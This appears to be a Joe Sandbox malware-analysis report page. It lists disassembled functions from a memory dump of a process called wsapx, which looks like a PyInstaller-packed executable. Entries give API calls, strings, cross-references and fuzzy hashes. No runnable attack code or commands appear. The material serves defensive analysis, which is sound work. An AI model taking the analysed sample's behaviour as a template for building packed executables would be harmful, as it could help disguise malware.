Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
API String ID: 3344901894-554953066
Opcode ID: 8fb5a4ad7f386661572e50f4d71446c1a6b03b0938a1a7950b2fa449bafe7a10
Instruction ID: ce7770a8b536a0857ee10c7ede7a97be621773b2fc7eb5f2eb33c6c519326c0f
Opcode Fuzzy Hash: 8fb5a4ad7f386661572e50f4d71446c1a6b03b0938a1a7950b2fa449bafe7a10
Instruction Fuzzy Hash: 5832AD72B08BC9C6EBA4CFA594E06B937A4FB46B88F418135DA4D47796DF38E450C780

Function 00007FF7C71C6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C6343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C6730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C69CC

Strings

p, xrefs: 00007FF7C71C63F5
:, xrefs: 00007FF7C71C64FC
f, xrefs: 00007FF7C71C6465
-, xrefs: 00007FF7C71C63D9
p, xrefs: 00007FF7C71C646D

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 4abb384f242921e5caf117a6d7df74cc094bcb271b34403e32910553b9a08c28
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 02128062A0C25387FB207E94F155279F6A1FBD0F60FD44535E68A46AC4DF3CE5828B20

Function 00007FF7C71C1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C1078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C1440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C16DF

Strings

f, xrefs: 00007FF7C71C1110
p, xrefs: 00007FF7C71C111D
f, xrefs: 00007FF7C71C117A
p, xrefs: 00007FF7C71C1182
f, xrefs: 00007FF7C71C12C5

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 5478132b5a48bde4f3d31b9344c6de7f427e734b29c478a26098793db5f17028
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 031261B1A4C14387FB20BE95B054679F261EBC0FB4FD84035D69946AC4DF7CE882AB21

Function 00007FF7C71B1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF7C71B10D3
fread, xrefs: 00007FF7C71B11FD
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7C71B10CC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7C71B1098
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7C71B11F6
malloc, xrefs: 00007FF7C71B110F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7C71B1108

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: e30da66bd449e278f4e1a8a1da43a6fc232ee02027dbecaf9a0becaf305aee32
Instruction ID: 67127a4641d1bf354300442f931eb79464fd7d3ecc53737f83b1d70d28718333
Opcode Fuzzy Hash: e30da66bd449e278f4e1a8a1da43a6fc232ee02027dbecaf9a0becaf305aee32
Instruction Fuzzy Hash: 2E4169A2A0865283EA10FF62B8416B9A395ABC4FE4FD54431ED1D47796DE3CE1078760

Function 00007FF7C71B8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B88F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B88FA
CreateDirectoryW.KERNEL32(?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B893C

Part of subcall function 00007FF7C71B8A20: GetEnvironmentVariableW.KERNEL32(00007FF7C71B388E), ref: 00007FF7C71B8A57
Part of subcall function 00007FF7C71B8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C71B8A79

Part of subcall function 00007FF7C71C82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C82C1

Part of subcall function 00007FF7C71B2810: MessageBoxW.USER32 ref: 00007FF7C71B28EA

Strings

TMP, xrefs: 00007FF7C71B888C, 00007FF7C71B8993
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF7C71B896E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF7C71B88CC
TMP, xrefs: 00007FF7C71B88B2
_MEI%d, xrefs: 00007FF7C71B8902

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
Instruction ID: ec5bfb5899b85b3e7ad5484b1e45a380087749ebb51df6dd078f1317718654c1
Opcode Fuzzy Hash: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
Instruction Fuzzy Hash: BE41B261A1964243FA11BF66B8962F992A0AFC9FA0FC04031DD0D4779ADE3CE5078760

Function 00007FF7C71BEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7C71BEAD5

Part of subcall function 00007FF7C71BFA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF7C71BFA6F
Part of subcall function 00007FF7C71BFA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7C71BFA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7C71BEBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7C71BEDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7C71BEF08

Strings

csm, xrefs: 00007FF7C71BEAEF
csm, xrefs: 00007FF7C71BEBD0
csm, xrefs: 00007FF7C71BEB56

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: a642eb1b9395f5677efa44121c080aac7778333b7e7bdf810118405a9d7ae0a3
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 97D1C4B2A0874187EB20EF64E4413ADB7A4FB85BA8F840135EE8D57B95CF38E156C710

Function 00007FF7C71CED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF7C71CF11A,?,?,000001C877BE6668,00007FF7C71CADC3,?,?,?,00007FF7C71CACBA,?,?,?,00007FF7C71C5FAE), ref: 00007FF7C71CEEFC
GetProcAddress.KERNEL32(?,?,?,00007FF7C71CF11A,?,?,000001C877BE6668,00007FF7C71CADC3,?,?,?,00007FF7C71CACBA,?,?,?,00007FF7C71C5FAE), ref: 00007FF7C71CEF08

Strings

api-ms-, xrefs: 00007FF7C71CEE46
ext-ms-, xrefs: 00007FF7C71CEE59

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: 4f0361497c197a877d9f78481c4e2f4a0ae586d01af83d02d19e700cfb4477c8
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 6B41E321B1960243FA16EF56B804575A399BF88FF0FD84539DD1D57784EE3CE50A8320

Function 00007FF7C71B2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
MessageBoxW.USER32 ref: 00007FF7C71B2D99

Strings

%ls: , xrefs: 00007FF7C71B2D22
Error, xrefs: 00007FF7C71B2D8C
<FormatMessageW failed.>, xrefs: 00007FF7C71B2D70
[PYI-%d:ERROR] , xrefs: 00007FF7C71B2CA6

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: c7874b6e1f3c0e2f740e3ef0c920de6f20d07722c257f8f0df6a6739500b376a
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: E731B662B08A4143E621AF15B8542AAA695BFC8BE8F814135DF4E93759DE3CD60BC710

Function 00007FF7C71BDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDBD
GetLastError.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDF5
FreeLibrary.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDE63
GetProcAddress.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDE6F

Strings

api-ms-, xrefs: 00007FF7C71BDDDD

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: ba0473aa731bf7e42cd85fbf2bf0c8852bc16cdb4feb7f1355fe2df894286e21
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 4631C361B2A60286EE2AAF42B841575A394FF98FB0FC94135DD5D17380EF3CE4468724

Function 00007FF7C71B2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7C71B351A,?,00000000,00007FF7C71B3F23), ref: 00007FF7C71B2AA0

Strings

[PYI-%d:%s] , xrefs: 00007FF7C71B2AA8
WARNING, xrefs: 00007FF7C71B2AAF
Warning, xrefs: 00007FF7C71B2B1E
0, xrefs: 00007FF7C71B2B16
Warning [ANSI Fallback], xrefs: 00007FF7C71B2B0F

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 6b5531451ddfac0b76ca5acae421f9e055fb2d1d851ddc85a51b2d2b1c47eff7
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 6D218372A1978183E621AF51B4817E6A394FBC8BE4F800135EE8D43659DF3CD6468750

Function 00007FF7C71B8760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7C71B8780
OpenProcessToken.ADVAPI32 ref: 00007FF7C71B8793
GetTokenInformation.ADVAPI32 ref: 00007FF7C71B87B8
GetLastError.KERNEL32 ref: 00007FF7C71B87C2
GetTokenInformation.ADVAPI32 ref: 00007FF7C71B8802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7C71B881E
CloseHandle.KERNEL32 ref: 00007FF7C71B8836

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
Instruction ID: 2a7b28c8b8fe390e5f37d72770fe89c93e9a5191be55e77e847426bb886f5d33
Opcode Fuzzy Hash: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
Instruction Fuzzy Hash: 3D215E61A0C64243EB10AF56F49563AE7B1FFC5FB0F900235EAAD43AE4DE6CD4468B50

Function 00007FF7C71CB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7C71CB1CF
FlsGetValue.KERNEL32 ref: 00007FF7C71CB1E4
FlsSetValue.KERNEL32 ref: 00007FF7C71CB205
FlsSetValue.KERNEL32 ref: 00007FF7C71CB232
FlsSetValue.KERNEL32 ref: 00007FF7C71CB243
FlsSetValue.KERNEL32 ref: 00007FF7C71CB254
SetLastError.KERNEL32 ref: 00007FF7C71CB26F

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction ID: 96679687bb0f867858aec36cca566132b03a234d53476b55c5c9711b93eb1809
Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction Fuzzy Hash: 7C215721F0C28243FA697FA1765613DE1965FC4FB0F808634E93E86AD6DE2CB5438321

Function 00007FF7C71D7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7C71D7E0D
GetLastError.KERNEL32 ref: 00007FF7C71D7E19
CloseHandle.KERNEL32 ref: 00007FF7C71D7E31
CreateFileW.KERNEL32 ref: 00007FF7C71D7E5C
WriteConsoleW.KERNEL32 ref: 00007FF7C71D7E7B

Strings

CONOUT$, xrefs: 00007FF7C71D7E3D

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 0226122bda733956a6502481375fa0f909eb21a739ada15b9670158838be3f89
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: FC11D631718A4187E361AF12F884329A2A0FBD8FF4F800234D95E87794DF3CE9458B50

Function 00007FF7C71B8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B8592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B85E9

Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B8678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B86E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B86F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B870A

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
Instruction ID: 294a10dc7d3b9772d298fc8b9ea58a2a6babd96ee555ac5c571488e1705874c8
Opcode Fuzzy Hash: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
Instruction Fuzzy Hash: 384191A2B1868243E730AF12B5406AAA394FBC8FE4F840135DE4D57B89DE3CD543C760

Function 00007FF7C71B90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C71B8760: GetCurrentProcess.KERNEL32 ref: 00007FF7C71B8780
Part of subcall function 00007FF7C71B8760: OpenProcessToken.ADVAPI32 ref: 00007FF7C71B8793
Part of subcall function 00007FF7C71B8760: GetTokenInformation.ADVAPI32 ref: 00007FF7C71B87B8
Part of subcall function 00007FF7C71B8760: GetLastError.KERNEL32 ref: 00007FF7C71B87C2
Part of subcall function 00007FF7C71B8760: GetTokenInformation.ADVAPI32 ref: 00007FF7C71B8802
Part of subcall function 00007FF7C71B8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7C71B881E
Part of subcall function 00007FF7C71B8760: CloseHandle.KERNEL32 ref: 00007FF7C71B8836

LocalFree.KERNEL32(?,00007FF7C71B3C55), ref: 00007FF7C71B916C
LocalFree.KERNEL32(?,00007FF7C71B3C55), ref: 00007FF7C71B9175

Strings

S-1-3-4, xrefs: 00007FF7C71B9121
D:(A;;FA;;;%s), xrefs: 00007FF7C71B9157
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF7C71B9183
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF7C71B9142

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
